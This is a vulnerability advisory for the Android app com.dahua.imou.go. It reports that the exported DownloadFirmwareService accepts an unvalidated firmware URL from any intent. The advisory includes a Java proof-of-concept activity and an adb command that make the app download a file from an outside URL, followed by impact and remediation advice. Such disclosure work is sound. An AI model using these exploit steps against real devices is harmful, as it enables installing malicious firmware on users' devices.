Skip to content

Latest commit

 

History

History
65 lines (45 loc) · 3.19 KB

com.dahua.imou.go-V1.0.11.md

File metadata and controls

65 lines (45 loc) · 3.19 KB

Thecom.oneed.dvr.service.DownloadFirmwareService component within the Android app com.dahua.imou.go possesses a vulnerability. An remote attacker(via a malicious app can control the URL path of firmware downloads, potentially leading to arbitrary code execution or a compromised device state.

Details

  • Affected Component: com.oneed.dvr.service.DownloadFirmwareService
  • Affected Application: com.dahua.imou.go
  • Vulnerability Type: Improper Input Validation / Arbitrary File Write
  • CWE-20: Improper Input Validation - This weakness describes a failure to sanitize, filter, or verify data or input.
  • CWE-494: Download of Code Without Integrity Check - This weakness points to systems that download code without ensuring the authenticity or source integrity.

Description

The com.oneed.dvr.service.DownloadFirmwareService in the app com.dahua.imou.go retrieves a firmware download URL from incoming intents. The service does not validate the origin or authenticity of this intent, nor does it verify the integrity of the downloaded content. This vulnerability exposes devices to:

  1. Attacker-controlled intents with malicious firmware URLs.
  2. Potential downloads, storage, and execution of malicious firmware.

Proof of Concept (PoC)

Java Android PoC Sample Code:

public class MaliciousActivity extends AppCompatActivity {
   
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_malicious);
       
        // Intent targeting the vulnerable service
        Intent exploitIntent = new Intent();
        exploitIntent.setComponent(new ComponentName("com.dahua.imou.go", "com.oneed.dvr.service.DownloadFirmwareService"));
       
        // Setting malicious firmware URL
        Uri maliciousURL = Uri.parse("https://www.learningcontainer.com/wp-content/uploads/2020/05/sample-zip-file.zip");
        exploitIntent.setData(maliciousURL);
       
        // Send the intent to exploit the vulnerability
        startService(exploitIntent);
    }
}
image

ALT POC:

adb shell am startservice -n com.dahua.imou.go/com.oneed.dvr.service.DownloadFirmwareService --es "url" "https://www.learningcontainer.com/wp-content/uploads/2020/05/sample-zip-file.zip"

Impact

  • Arbitrary code execution: If the malicious firmware is loaded and executed, it allows an attacker to execute arbitrary code on the device.
  • Modified device behavior: An attacker can change the behavior of the device, leading to potential data exposure or unauthorized device actions.

Recommendation

  1. Implement stringent input validation to ensure only valid firmware URLs are accepted.
  2. Utilize cryptographic checks (like signature verification) to ascertain the integrity of downloaded firmware.
  3. Set intent permissions or restrict the exported nature of the service, limiting its accessibility.

References